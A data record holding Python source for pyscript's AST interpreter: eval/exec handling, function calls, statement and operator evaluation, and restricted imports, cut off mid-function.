+{"seq_id": "135242755", "text": "\"\"\"Python interpreter for pyscript.\"\"\"\n\nimport ast\nimport asyncio\nimport builtins\nimport importlib\nimport logging\nimport sys\n\nfrom .const import ALLOWED_IMPORTS, LOGGER_PATH\n\n_LOGGER = logging.getLogger(LOGGER_PATH + \".eval\")\n\n#\n# Built-ins to exclude to improve security or avoid i/o\n#\nBUILTIN_EXCLUDE = {\n \"breakpoint\",\n \"compile\",\n \"input\",\n \"memoryview\",\n \"open\",\n \"print\",\n}\n\n\ndef ast_eval_exec_factory(ast_ctx, str_type):\n \"\"\"Generate a function that executes eval() or exec() with given ast_ctx.\"\"\"\n\n async def eval_func(arg_str, eval_globals=None, eval_locals=None):\n eval_ast = AstEval(\n ast_ctx.name,\n global_ctx=ast_ctx.global_ctx,\n state_func=ast_ctx.state,\n event_func=ast_ctx.event,\n handler_func=ast_ctx.handler,\n )\n eval_ast.parse(arg_str, f\"{str_type}()\")\n if eval_ast.exception_obj:\n raise eval_ast.exception_obj # pylint: disable=raising-bad-type\n eval_ast.local_sym_table = ast_ctx.local_sym_table\n if eval_globals is not None:\n eval_ast.global_sym_table = eval_globals\n if eval_locals is not None:\n eval_ast.sym_table_stack = [eval_globals]\n eval_ast.sym_table = eval_locals\n else:\n eval_ast.sym_table_stack = []\n eval_ast.sym_table = eval_globals\n else:\n eval_ast.sym_table_stack = ast_ctx.sym_table_stack.copy()\n eval_ast.sym_table = ast_ctx.sym_table\n eval_ast.curr_func = ast_ctx.curr_func\n try:\n eval_result = await eval_ast.aeval(eval_ast.ast)\n except Exception as err:\n ast_ctx.exception_obj = err\n ast_ctx.exception = f\"Exception in {ast_ctx.filename} line {ast_ctx.lineno} column {ast_ctx.col_offset}: {eval_ast.exception}\"\n ast_ctx.exception_long = (\n ast_ctx.format_exc(err, ast_ctx.lineno, ast_ctx.col_offset, short=True)\n + \"\\n\"\n + eval_ast.exception_long\n )\n raise\n ast_ctx.curr_func = eval_ast.curr_func\n return eval_result\n\n return eval_func\n\n\ndef ast_eval_factory(ast_ctx):\n \"\"\"Generate a function that executes eval() with given ast_ctx.\"\"\"\n return ast_eval_exec_factory(ast_ctx, \"eval\")\n\n\ndef ast_exec_factory(ast_ctx):\n \"\"\"Generate a function that executes exec() with given ast_ctx.\"\"\"\n return ast_eval_exec_factory(ast_ctx, \"exec\")\n\n\ndef ast_globals_factory(ast_ctx):\n \"\"\"Generate a globals() function with given ast_ctx.\"\"\"\n\n async def globals_func():\n return ast_ctx.global_sym_table\n\n return globals_func\n\n\ndef ast_locals_factory(ast_ctx):\n \"\"\"Generate a locals() function with given ast_ctx.\"\"\"\n\n async def locals_func():\n return ast_ctx.sym_table\n\n return locals_func\n\n\n#\n# Built-in functions that are also passed the ast context\n#\nBUILTIN_AST_FUNCS_FACTORY = {\n \"eval\": ast_eval_factory,\n \"exec\": ast_exec_factory,\n \"globals\": ast_globals_factory,\n \"locals\": ast_locals_factory,\n}\n\n\n#\n# Objects returned by return, break and continue statements that change execution flow,\n# or objects returned that capture particular information\n#\nclass EvalStopFlow:\n \"\"\"Denotes a statement or action that stops execution flow, eg: return, break etc.\"\"\"\n\n\nclass EvalReturn(EvalStopFlow):\n \"\"\"Return statement.\"\"\"\n\n def __init__(self, value):\n \"\"\"Initialize return statement value.\"\"\"\n self.value = value\n\n\nclass EvalBreak(EvalStopFlow):\n \"\"\"Break statement.\"\"\"\n\n\nclass EvalContinue(EvalStopFlow):\n \"\"\"Continue statement.\"\"\"\n\n\nclass EvalName:\n \"\"\"Identifier that hasn't yet been resolved.\"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize 
identifier to name.\"\"\"\n self.name = name\n\n def __getattr__(self, attr):\n \"\"\"Get attribute for EvalName.\"\"\"\n raise NameError(f\"name '{self.name}.{attr}' is not defined\")\n\n\nclass EvalAttrSet:\n \"\"\"Class for object and attribute on lhs of assignment.\"\"\"\n\n def __init__(self, obj, attr):\n \"\"\"Initialize identifier to name.\"\"\"\n self.obj = obj\n self.attr = attr\n\n def setattr(self, value):\n \"\"\"Set the attribute value.\"\"\"\n setattr(self.obj, self.attr, value)\n\n def getattr(self):\n \"\"\"Get the attribute value.\"\"\"\n return getattr(self.obj, self.attr)\n\n\nclass EvalFunc:\n \"\"\"Class for a callable pyscript function.\"\"\"\n\n def __init__(self, func_def, code_list, code_str):\n \"\"\"Initialize a function calling context.\"\"\"\n self.func_def = func_def\n self.name = func_def.name\n self.defaults = []\n self.kw_defaults = []\n self.decorators = []\n self.global_names = set()\n self.nonlocal_names = set()\n self.doc_string = ast.get_docstring(func_def)\n self.num_posn_arg = len(self.func_def.args.args) - len(self.defaults)\n self.code_list = code_list\n self.code_str = code_str\n self.exception = None\n self.exception_obj = None\n self.exception_long = None\n\n def get_name(self):\n \"\"\"Return the function name.\"\"\"\n return self.name\n\n async def eval_defaults(self, ast_ctx):\n \"\"\"Evaluate the default function arguments.\"\"\"\n self.defaults = []\n for val in self.func_def.args.defaults:\n self.defaults.append(await ast_ctx.aeval(val))\n self.num_posn_arg = len(self.func_def.args.args) - len(self.defaults)\n self.kw_defaults = []\n for val in self.func_def.args.kw_defaults:\n self.kw_defaults.append(\n {\"ok\": bool(val), \"val\": None if not val else await ast_ctx.aeval(val)}\n )\n\n async def eval_decorators(self, ast_ctx):\n \"\"\"Evaluate the function decorators arguments.\"\"\"\n self.decorators = []\n ast_ctx.code_str = self.code_str\n ast_ctx.code_list = self.code_list\n for dec in self.func_def.decorator_list:\n if isinstance(dec, ast.Call) and isinstance(dec.func, ast.Name):\n args = []\n for arg in dec.args:\n args.append(await ast_ctx.aeval(arg))\n self.decorators.append([dec.func.id, args])\n elif isinstance(dec, ast.Name):\n self.decorators.append([dec.id, None])\n else:\n _LOGGER.error(\n \"function %s has unexpected decorator type %s\", self.name, dec\n )\n\n def get_decorators(self):\n \"\"\"Return the function decorators.\"\"\"\n return self.decorators\n\n def get_doc_string(self):\n \"\"\"Return the function doc_string.\"\"\"\n return self.doc_string\n\n def get_positional_args(self):\n \"\"\"Return the function positional arguments.\"\"\"\n args = []\n for arg in self.func_def.args.args:\n args.append(arg.arg)\n return args\n\n async def try_aeval(self, ast_ctx, arg):\n \"\"\"Call self.aeval and capture exceptions.\"\"\"\n try:\n return await ast_ctx.aeval(arg)\n except asyncio.CancelledError: # pylint: disable=try-except-raise\n raise\n except Exception as err: # pylint: disable=broad-except\n if ast_ctx.exception_long is None:\n ast_ctx.exception_long = ast_ctx.format_exc(\n err, arg.lineno, arg.col_offset\n )\n\n async def call(self, ast_ctx, args=None, kwargs=None):\n \"\"\"Call the function with the given context and arguments.\"\"\"\n sym_table = {}\n if args is None:\n args = []\n kwargs = kwargs.copy() if kwargs else {}\n for i in range(len(self.func_def.args.args)):\n var_name = self.func_def.args.args[i].arg\n val = None\n if i < len(args):\n val = args[i]\n if var_name in kwargs:\n raise TypeError(\n 
f\"{self.name}() got multiple values for argument '{var_name}'\"\n )\n elif var_name in kwargs:\n val = kwargs[var_name]\n del kwargs[var_name]\n elif self.num_posn_arg <= i < len(self.defaults) + self.num_posn_arg:\n val = self.defaults[i - self.num_posn_arg]\n else:\n raise TypeError(\n f\"{self.name}() missing {self.num_posn_arg - i} required positional arguments\"\n )\n sym_table[var_name] = val\n for i in range(len(self.func_def.args.kwonlyargs)):\n var_name = self.func_def.args.kwonlyargs[i].arg\n if var_name in kwargs:\n val = kwargs[var_name]\n del kwargs[var_name]\n elif i < len(self.kw_defaults) and self.kw_defaults[i][\"ok\"]:\n val = self.kw_defaults[i][\"val\"]\n else:\n raise TypeError(\n f\"{self.name}() missing required keyword-only arguments\"\n )\n sym_table[var_name] = val\n if self.func_def.args.kwarg:\n sym_table[self.func_def.args.kwarg.arg] = kwargs\n if self.func_def.args.vararg:\n if len(args) > len(self.func_def.args.args):\n sym_table[self.func_def.args.vararg.arg] = tuple(\n args[len(self.func_def.args.args) :]\n )\n else:\n sym_table[self.func_def.args.vararg.arg] = ()\n elif len(args) > len(self.func_def.args.args):\n raise TypeError(f\"{self.name}() called with too many positional arguments\")\n ast_ctx.sym_table_stack.append(ast_ctx.sym_table)\n ast_ctx.sym_table = sym_table\n ast_ctx.code_str = self.code_str\n ast_ctx.code_list = self.code_list\n self.exception = None\n self.exception_obj = None\n self.exception_long = None\n prev_func = ast_ctx.curr_func\n ast_ctx.curr_func = self\n for arg1 in self.func_def.body:\n val = await self.try_aeval(ast_ctx, arg1)\n if isinstance(val, EvalReturn):\n val = val.value\n break\n # return None at end if there isn't a return\n val = None\n if ast_ctx.get_exception_obj():\n break\n ast_ctx.sym_table = ast_ctx.sym_table_stack.pop()\n ast_ctx.curr_func = prev_func\n return val\n\n\nclass AstEval:\n \"\"\"Python interpreter AST object evaluator.\"\"\"\n\n def __init__(\n self,\n name,\n global_ctx=None,\n state_func=None,\n event_func=None,\n handler_func=None,\n logger_name=None,\n ):\n \"\"\"Initialize an interpreter execution context.\"\"\"\n self.name = name\n self.str = None\n self.ast = None\n self.global_ctx = global_ctx\n self.global_sym_table = global_ctx.get_global_sym_table() if global_ctx else {}\n self.sym_table_stack = []\n self.sym_table = self.global_sym_table\n self.local_sym_table = {}\n self.curr_func = None\n self.filename = name\n self.code_str = None\n self.code_list = None\n self.exception = None\n self.exception_obj = None\n self.exception_long = None\n self.state = state_func\n self.handler = handler_func\n self.event = event_func\n self.lineno = 1\n self.col_offset = 0\n self.logger_handlers = set()\n self.logger = None\n self.set_logger_name(logger_name if logger_name is not None else self.name)\n\n async def ast_not_implemented(self, arg, *args):\n \"\"\"Raise NotImplementedError exception for unimplemented AST types.\"\"\"\n name = \"ast_\" + arg.__class__.__name__.lower()\n raise NotImplementedError(f\"{self.name}: not implemented ast \" + name)\n\n async def aeval(self, arg, undefined_check=True):\n \"\"\"Vector to specific function based on ast class type.\"\"\"\n name = \"ast_\" + arg.__class__.__name__.lower()\n try:\n if hasattr(arg, \"lineno\"):\n self.lineno = arg.lineno\n self.col_offset = arg.col_offset\n val = await getattr(self, name, self.ast_not_implemented)(arg)\n if undefined_check and isinstance(val, EvalName):\n raise NameError(f\"name '{val.name}' is not defined\")\n return 
val\n except Exception as err: # pylint: disable=broad-except\n if self.exception is None:\n func_name = self.curr_func.get_name() + \"(), \" if self.curr_func else \"\"\n self.exception_obj = err\n self.exception = f\"Exception in {func_name}{self.filename} line {self.lineno} column {self.col_offset}: {err}\"\n self.exception_long = self.format_exc(err, self.lineno, self.col_offset)\n raise\n\n # Statements return NONE, EvalBreak, EvalContinue, EvalReturn\n async def ast_module(self, arg):\n \"\"\"Execute ast_module - a list of statements.\"\"\"\n val = None\n for arg1 in arg.body:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n return val\n return val\n\n async def ast_import(self, arg):\n \"\"\"Execute import.\"\"\"\n for imp in arg.names:\n if imp.name not in ALLOWED_IMPORTS:\n raise ModuleNotFoundError(f\"import of {imp.name} not allowed\")\n if imp.name not in sys.modules:\n mod = importlib.import_module(imp.name)\n else:\n mod = sys.modules[imp.name]\n self.sym_table[imp.name if imp.asname is None else imp.asname] = mod\n\n async def ast_importfrom(self, arg):\n \"\"\"Execute from X import Y.\"\"\"\n if arg.module not in ALLOWED_IMPORTS:\n raise ModuleNotFoundError(f\"import from {arg.module} not allowed\")\n if arg.module not in sys.modules:\n mod = importlib.import_module(arg.module)\n else:\n mod = sys.modules[arg.module]\n for imp in arg.names:\n self.sym_table[imp.name if imp.asname is None else imp.asname] = getattr(\n mod, imp.name\n )\n\n async def ast_if(self, arg):\n \"\"\"Execute if statement.\"\"\"\n val = None\n if await self.aeval(arg.test):\n for arg1 in arg.body:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n return val\n else:\n for arg1 in arg.orelse:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n return val\n return val\n\n async def ast_for(self, arg):\n \"\"\"Execute for statement.\"\"\"\n loop_var = await self.aeval(arg.target)\n loop_iter = await self.aeval(arg.iter)\n for i in loop_iter:\n self.sym_table[loop_var] = i\n for arg1 in arg.body:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n break\n if isinstance(val, EvalBreak):\n break\n if isinstance(val, EvalReturn):\n return val\n else:\n for arg1 in arg.orelse:\n val = await self.aeval(arg1)\n if isinstance(val, EvalReturn):\n return val\n return None\n\n async def ast_while(self, arg):\n \"\"\"Execute while statement.\"\"\"\n while await self.aeval(arg.test):\n for arg1 in arg.body:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n break\n if isinstance(val, EvalBreak):\n break\n if isinstance(val, EvalReturn):\n return val\n else:\n for arg1 in arg.orelse:\n val = await self.aeval(arg1)\n if isinstance(val, EvalReturn):\n return val\n return None\n\n async def ast_try(self, arg):\n \"\"\"Execute try...except statement.\"\"\"\n try:\n for arg1 in arg.body:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n return val\n if self.exception_obj is not None:\n raise self.exception_obj # pylint: disable=raising-bad-type\n except Exception as err: # pylint: disable=broad-except\n self.exception_obj = None\n self.exception = None\n self.exception_long = None\n for handler in arg.handlers:\n exc_list = await self.aeval(handler.type)\n if not isinstance(exc_list, tuple):\n exc_list = [exc_list]\n match = False\n for exc in exc_list:\n if isinstance(err, exc):\n match = True\n break\n if match:\n if handler.name is not None:\n self.sym_table[handler.name] = err\n for arg1 in handler.body:\n val 
= await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n if handler.name is not None:\n del self.sym_table[handler.name]\n return val\n if self.exception_obj is not None:\n if handler.name is not None:\n del self.sym_table[handler.name]\n raise self.exception_obj # pylint: disable=raising-bad-type\n if handler.name is not None:\n del self.sym_table[handler.name]\n break\n else:\n raise err\n else:\n for arg1 in arg.orelse:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n return val\n finally:\n for arg1 in arg.finalbody:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n return val # pylint: disable=lost-exception\n return None\n\n async def ast_raise(self, arg):\n \"\"\"Execute raise statement.\"\"\"\n raise await self.aeval(arg.exc)\n\n async def ast_pass(self, arg):\n \"\"\"Execute pass statement.\"\"\"\n\n async def ast_expr(self, arg):\n \"\"\"Execute expression statement.\"\"\"\n return await self.aeval(arg.value)\n\n async def ast_break(self, arg):\n \"\"\"Execute break statement - return special class.\"\"\"\n return EvalBreak()\n\n async def ast_continue(self, arg):\n \"\"\"Execute continue statement - return special class.\"\"\"\n return EvalContinue()\n\n async def ast_return(self, arg):\n \"\"\"Execute return statement - return special class.\"\"\"\n val = await self.aeval(arg.value)\n return EvalReturn(val)\n\n async def ast_global(self, arg):\n \"\"\"Execute global statement.\"\"\"\n if self.curr_func:\n for var_name in arg.names:\n self.curr_func.global_names.add(var_name)\n\n async def ast_nonlocal(self, arg):\n \"\"\"Execute nonlocal statement.\"\"\"\n if self.curr_func:\n for var_name in arg.names:\n self.curr_func.nonlocal_names.add(var_name)\n\n async def recurse_assign(self, lhs, val):\n \"\"\"Recursive assignment.\"\"\"\n if isinstance(lhs, ast.Tuple):\n try:\n val_len = len(val)\n except TypeError:\n raise TypeError(\"cannot unpack non-iterable object\")\n if len(lhs.elts) < val_len:\n raise ValueError(\n f\"too many values to unpack (expected {len(lhs.elts)})\"\n )\n if len(lhs.elts) > val_len:\n raise ValueError(f\"too few values to unpack (expected {len(lhs.elts)})\")\n for lhs_elt, val_elt in zip(lhs.elts, val):\n await self.recurse_assign(lhs_elt, val_elt)\n elif isinstance(lhs, ast.Subscript):\n var = await self.aeval(lhs.value)\n if isinstance(lhs.slice, ast.Index):\n ind = await self.aeval(lhs.slice.value)\n var[ind] = val\n else:\n lower = await self.aeval(lhs.slice.lower) if lhs.slice.lower else None\n upper = await self.aeval(lhs.slice.upper) if lhs.slice.upper else None\n step = await self.aeval(lhs.slice.step) if lhs.slice.step else None\n var[slice(lower, upper, step)] = val\n else:\n var_name = await self.aeval(lhs)\n if isinstance(var_name, EvalAttrSet):\n var_name.setattr(val)\n return\n if var_name.find(\".\") >= 0:\n self.state.set(var_name, val)\n return\n if self.curr_func and var_name in self.curr_func.global_names:\n self.global_sym_table[var_name] = val\n return\n if self.curr_func and var_name in self.curr_func.nonlocal_names:\n for sym_table in reversed(self.sym_table_stack[1:]):\n if var_name in sym_table:\n sym_table[var_name] = val\n return\n else:\n raise TypeError(f\"can't find nonlocal '{var_name}' for assignment\")\n self.sym_table[var_name] = val\n\n async def ast_assign(self, arg):\n \"\"\"Execute assignment statement.\"\"\"\n await self.recurse_assign(arg.targets[0], await self.aeval(arg.value))\n\n async def ast_augassign(self, arg):\n \"\"\"Execute augmented assignment statement (lhs <op>= 
value).\"\"\"\n var_name = await self.aeval(arg.target)\n if isinstance(var_name, EvalAttrSet):\n val = await self.aeval(\n ast.BinOp(\n left=ast.Constant(value=var_name.getattr()),\n op=arg.op,\n right=arg.value,\n )\n )\n var_name.setattr(val)\n else:\n val = await self.aeval(\n ast.BinOp(\n left=ast.Name(id=var_name, ctx=ast.Load()),\n op=arg.op,\n right=arg.value,\n )\n )\n if self.curr_func and var_name in self.curr_func.global_names:\n self.global_sym_table[var_name] = val\n elif self.curr_func and var_name in self.curr_func.nonlocal_names:\n for sym_table in reversed(self.sym_table_stack[1:]):\n if var_name in sym_table:\n sym_table[var_name] = val\n break\n else:\n raise TypeError(f\"can't find nonlocal '{var_name}' for assignment\")\n elif self.state.exist(var_name):\n self.state.set(var_name, val)\n else:\n self.sym_table[var_name] = val\n\n async def ast_delete(self, arg):\n \"\"\"Execute del statement.\"\"\"\n for arg1 in arg.targets:\n if isinstance(arg1, ast.Subscript):\n var = await self.aeval(arg1.value)\n if isinstance(arg1.slice, ast.Index):\n ind = await self.aeval(arg1.slice.value)\n for elt in ind if isinstance(ind, list) else [ind]:\n del var[elt]\n elif isinstance(arg1.slice, ast.Slice):\n lower, upper, step = None, None, None\n if arg1.slice.lower:\n lower = await self.aeval(arg1.slice.lower)\n if arg1.slice.upper:\n upper = await self.aeval(arg1.slice.upper)\n if arg1.slice.step:\n step = await self.aeval(arg1.slice.step)\n del var[slice(lower, upper, step)]\n else:\n raise NotImplementedError(\n f\"{self.name}: not implemented slice type {arg1.slice} in del\"\n )\n elif isinstance(arg1, ast.Name):\n if self.curr_func and arg1.id in self.curr_func.global_names:\n if arg1.id in self.global_sym_table:\n if isinstance(self.global_sym_table[arg1.id], EvalFunc):\n await self.global_ctx.stop(arg1.id)\n del self.global_sym_table[arg1.id]\n elif self.curr_func and arg1.id in self.curr_func.nonlocal_names:\n for sym_table in reversed(self.sym_table_stack[1:]):\n if arg1.id in sym_table:\n del sym_table[arg1.id]\n break\n elif arg1.id in self.sym_table:\n if isinstance(self.sym_table[arg1.id], EvalFunc):\n await self.global_ctx.stop(arg1.id)\n del self.sym_table[arg1.id]\n else:\n raise NameError(f\"name '{arg1.id}' is not defined in del\")\n else:\n raise NotImplementedError(f\"unknown target type {arg1} in del\")\n\n async def ast_attribute_collapse(self, arg): # pylint: disable=no-self-use\n \"\"\"Combine dotted attributes to allow variable names to have dots.\"\"\"\n # collapse dotted names, eg:\n # Attribute(value=Attribute(value=Name(id='i', ctx=Load()), attr='j', ctx=Load()), attr='k', ctx=Store())\n name = arg.attr\n val = arg.value\n while isinstance(val, ast.Attribute):\n name = val.attr + \".\" + name\n val = val.value\n if isinstance(val, ast.Name):\n name = val.id + \".\" + name\n # ensure the first portion of name is undefined\n val = await self.ast_name(ast.Name(id=val.id, ctx=ast.Load()))\n if not isinstance(val, EvalName):\n return None\n return name\n return None\n\n async def ast_attribute(self, arg):\n \"\"\"Apply attributes.\"\"\"\n full_name = await self.ast_attribute_collapse(arg)\n if full_name is not None:\n if isinstance(arg.ctx, ast.Store):\n return full_name\n val = await self.ast_name(ast.Name(id=full_name, ctx=arg.ctx))\n if not isinstance(val, EvalName):\n return val\n val = await self.aeval(arg.value)\n if isinstance(arg.ctx, ast.Store):\n return EvalAttrSet(val, arg.attr)\n return getattr(val, arg.attr)\n\n async def ast_name(self, arg):\n 
\"\"\"Look up value of identifier on load, or returns name on set.\"\"\"\n if isinstance(arg.ctx, ast.Load):\n #\n # check other scopes if required by global or nonlocal declarations\n #\n if self.curr_func and arg.id in self.curr_func.global_names:\n if arg.id in self.global_sym_table:\n return self.global_sym_table[arg.id]\n raise NameError(f\"global name '{arg.id}' is not defined\")\n if self.curr_func and arg.id in self.curr_func.nonlocal_names:\n for sym_table in reversed(self.sym_table_stack[1:]):\n if arg.id in sym_table:\n return sym_table[arg.id]\n raise NameError(f\"nonlocal name '{arg.id}' is not defined\")\n #\n # now check in our current symbol table, and then some other places\n #\n if arg.id in self.sym_table:\n return self.sym_table[arg.id]\n if arg.id in self.local_sym_table:\n return self.local_sym_table[arg.id]\n if arg.id in self.global_sym_table:\n return self.global_sym_table[arg.id]\n if arg.id in BUILTIN_AST_FUNCS_FACTORY:\n return BUILTIN_AST_FUNCS_FACTORY[arg.id](self)\n if (\n hasattr(builtins, arg.id)\n and arg.id not in BUILTIN_EXCLUDE\n and arg.id[0] != \"_\"\n ):\n return getattr(builtins, arg.id)\n if self.handler.get(arg.id):\n return self.handler.get(arg.id)\n num_dots = arg.id.count(\".\")\n #\n # any single-dot name could be a state variable\n # a two-dot name for state.attr needs to exist\n #\n if num_dots == 2:\n _LOGGER.debug(\n \"ast_name: arg = {arg.id}, exist = {self.state.exist(arg.id)}\"\n )\n if num_dots == 1 or (num_dots == 2 and self.state.exist(arg.id)):\n return self.state.get(arg.id)\n #\n # Couldn't find it, so return just the name wrapped in EvalName to\n # distinguish from a string variable value. This is to support\n # names with \".\", which are joined by ast_attribute\n #\n return EvalName(arg.id)\n return arg.id\n\n async def ast_binop(self, arg):\n \"\"\"Evaluate binary operators by calling function based on class.\"\"\"\n name = \"ast_binop_\" + arg.op.__class__.__name__.lower()\n return await getattr(self, name, self.ast_not_implemented)(arg.left, arg.right)\n\n async def ast_binop_add(self, arg0, arg1):\n \"\"\"Evaluate binary operator: +.\"\"\"\n return (await self.aeval(arg0)) + (await self.aeval(arg1))\n\n async def ast_binop_sub(self, arg0, arg1):\n \"\"\"Evaluate binary operator: -.\"\"\"\n return (await self.aeval(arg0)) - (await self.aeval(arg1))\n\n async def ast_binop_mult(self, arg0, arg1):\n \"\"\"Evaluate binary operator: *.\"\"\"\n return (await self.aeval(arg0)) * (await self.aeval(arg1))\n\n async def ast_binop_div(self, arg0, arg1):\n \"\"\"Evaluate binary operator: /.\"\"\"\n return (await self.aeval(arg0)) / (await self.aeval(arg1))\n\n async def ast_binop_mod(self, arg0, arg1):\n \"\"\"Evaluate binary operator: %.\"\"\"\n return (await self.aeval(arg0)) % (await self.aeval(arg1))\n\n async def ast_binop_pow(self, arg0, arg1):\n \"\"\"Evaluate binary operator: **.\"\"\"\n return (await self.aeval(arg0)) ** (await self.aeval(arg1))\n\n async def ast_binop_lshift(self, arg0, arg1):\n \"\"\"Evaluate binary operator: <<.\"\"\"\n return (await self.aeval(arg0)) << (await self.aeval(arg1))\n\n async def ast_binop_rshift(self, arg0, arg1):\n \"\"\"Evaluate binary operator: >>.\"\"\"\n return (await self.aeval(arg0)) >> (await self.aeval(arg1))\n\n async def ast_binop_bitor(self, arg0, arg1):\n \"\"\"Evaluate binary operator: |.\"\"\"\n return (await self.aeval(arg0)) | (await self.aeval(arg1))\n\n async def ast_binop_bitxor(self, arg0, arg1):\n \"\"\"Evaluate binary operator: ^.\"\"\"\n return (await self.aeval(arg0)) 
^ (await self.aeval(arg1))\n\n    async def ast_binop_bitand(self, arg0, arg1):\n        \"\"\"Evaluate binary operator: &.\"\"\"\n        return (await self.aeval(arg0)) & (await self.aeval(arg1))\n\n    async def ast_binop_floordiv(self, arg0, arg1):\n        \"\"\"Evaluate binary operator: //.\"\"\"\n        return (await self.aeval(arg0)) // (await self.aeval(arg1))\n\n    async def ast_unaryop(self, arg):\n        \"\"\"Evaluate unary operators by calling function based on class.\"\"\"\n        name = \"ast_unaryop_\" + arg.op.__class__.__name__.lower()\n        return await getattr(self, name, self.ast_not_implemented)(arg.operand)\n\n    async def ast_unaryop_not(self, arg0):\n        \"\"\"Evaluate unary operator: not.\"\"\"\n        return not (await self.aeval(arg0))\n\n    async def ast_unaryop_invert(self, arg0):\n        \"\"\"Evaluate unary operator: ~.\"\"\"\n        return ~(await self.aeval(arg0))\n\n    async def ast_unaryop_uadd(self, arg0):\n        \"\"\"Evaluate unary operator: +.\"\"\"\n        return await self.aeval(arg0)\n\n    async def ast_unaryop_usub(self, arg0):\n        \"\"\"Evaluate unary operator: -.\"\"\"\n        return -(await self.aeval(arg0))\n\n    async def ast_compare(self, arg):\n        \"\"\"Evaluate comparison operators by calling function based on class.\"\"\"\n        left = arg.left\n        for cmp_op, right in zip(arg.ops, arg.comparators):\n            name = \"ast_cmpop_\" + cmp_op.__class__.__name__.lower()\n            val = await getattr(self, name, self.ast_not_implemented)(left, right)\n            if not val:\n                return False\n            left = right\n        return True\n\n    async def ast_cmpop_eq(self, arg0, arg1):\n        \"\"\"Evaluate comparison operator: ==.\"\"\"\n        return (await self.aeval(arg0)) == (await self.aeval(arg1))\n\n    async def ast_cmpop_noteq(self, arg0, arg1):\n        \"\"\"Evaluate comparison operator: !=.\"\"\"\n        return (await self.aeval(arg0)) != (await self.aeval(arg1))\n\n    async def ast_cmpop_lt(self, arg0, arg1):\n        \"\"\"Evaluate comparison operator: <.\"\"\"\n        return (await self.aeval(arg0)) < (await self.aeval(arg1))\n\n    async def ast_cmpop_lte(self, arg0, arg1):\n        \"\"\"Evaluate comparison operator: <=.\"\"\"\n        return (await self.aeval(arg0)) <= (await self.aeval(arg1))\n\n    async def ast_cmpop_gt(self, arg0, arg1):\n        \"\"\"Evaluate comparison operator: >.\"\"\"\n        return (await self.aeval(arg0)) > (await self.aeval(arg1))\n\n    async def ast_cmpop_gte(self, arg0, arg1):\n        \"\"\"Evaluate comparison operator: >=.\"\"\"\n        return (await self.aeval(arg0)) >= (await self.aeval(arg1))\n\n    async def ast_cmpop_is(self, arg0, arg1):\n        \"\"\"Evaluate comparison operator: is.\"\"\"\n        return (await self.aeval(arg0)) is (await self.aeval(arg1))\n\n    async def ast_cmpop_isnot(self, arg0, arg1):\n        \"\"\"Evaluate comparison operator: is not.\"\"\"\n        return (await self.aeval(arg0)) is not (await self.aeval(arg1))\n\n    async def ast_cmpop_in(self, arg0, arg1):\n        \"\"\"Evaluate comparison operator: in.\"\"\"\n        return (await self.aeval(arg0)) in (await self.aeval(arg1))\n\n    async def ast_cmpop_notin(self, arg0, arg1):\n        \"\"\"Evaluate comparison operator: not in.\"\"\"\n        return (await self.aeval(arg0)) not in (await self.aeval(arg1))\n\n    async def ast_boolop(self, arg):\n        \"\"\"Evaluate the boolean operators 'and' and 'or'.\"\"\"\n        if isinstance(arg.op, ast.And):\n            val = 1\n            for arg1 in arg.values:\n                this_val = await self.aeval(arg1)\n                if this_val == 0:\n                    return 0\n                val = this_val\n            return val\n        for arg1 in arg.values:\n            val = await self.aeval(arg1)\n            if val != 0:\n                return val\n        return 0\n\n    async def eval_elt_list(self, elts):\n        \"\"\"Evaluate a list of elements, expanding any starred elements.\"\"\"\n        val = []\n        for arg in elts:\n            if isinstance(arg, ast.Starred):\n                for 
this_val in await self.aeval(arg.value):\n val.append(this_val)\n else:\n this_val = await self.aeval(arg)\n val.append(this_val)\n return val\n\n async def ast_list(self, arg):\n \"\"\"Evaluate list.\"\"\"\n if isinstance(arg.ctx, ast.Load):\n return await self.eval_elt_list(arg.elts)\n\n async def ast_tuple(self, arg):\n \"\"\"Evaluate Tuple.\"\"\"\n return tuple(await self.eval_elt_list(arg.elts))\n\n async def ast_dict(self, arg):\n \"\"\"Evaluate dict.\"\"\"\n val = {}\n for key_ast, val_ast in zip(arg.keys, arg.values):\n this_val = await self.aeval(val_ast)\n if key_ast is None:\n val.update(this_val)\n else:\n val[await self.aeval(key_ast)] = this_val\n return val\n\n async def ast_set(self, arg):\n \"\"\"Evaluate set.\"\"\"\n val = set()\n for elt in await self.eval_elt_list(arg.elts):\n val.add(elt)\n return val\n\n async def ast_subscript(self, arg):\n \"\"\"Evaluate subscript.\"\"\"\n var = await self.aeval(arg.value)\n if isinstance(arg.ctx, ast.Load):\n if isinstance(arg.slice, ast.Index):\n return var[await self.aeval(arg.slice)]\n if isinstance(arg.slice, ast.Slice):\n lower = (await self.aeval(arg.slice.lower)) if arg.slice.lower else None\n upper = (await self.aeval(arg.slice.upper)) if arg.slice.upper else None\n step = (await self.aeval(arg.slice.step)) if arg.slice.step else None\n return var[slice(lower, upper, step)]\n else:\n return None\n\n async def ast_index(self, arg):\n \"\"\"Evaluate index.\"\"\"\n return await self.aeval(arg.value)\n\n async def ast_slice(self, arg):\n \"\"\"Evaluate slice.\"\"\"\n return await self.aeval(arg.value)\n\n async def ast_call(self, arg):\n \"\"\"Evaluate function call.\"\"\"\n func = await self.aeval(arg.func)\n kwargs = {}\n for kw_arg in arg.keywords:\n if kw_arg.arg is None:\n kwargs.update(await self.aeval(kw_arg.value))\n else:\n kwargs[kw_arg.arg] = await self.aeval(kw_arg.value)\n args = await self.eval_elt_list(arg.args)\n arg_str = \", \".join(\n ['\"' + elt + '\"' if isinstance(elt, str) else str(elt) for elt in args]\n )\n\n if isinstance(func, EvalFunc):\n return await func.call(self, args, kwargs)\n #\n # try to deduce function name, although this only works in simple cases\n #\n if isinstance(arg.func, ast.Name):\n func_name = arg.func.id\n elif isinstance(arg.func, ast.Attribute):\n func_name = arg.func.attr\n else:\n func_name = \"\"\n if callable(func):\n _LOGGER.debug(\n \"%s: calling %s(%s, %s)\", self.name, func_name, arg_str, kwargs\n 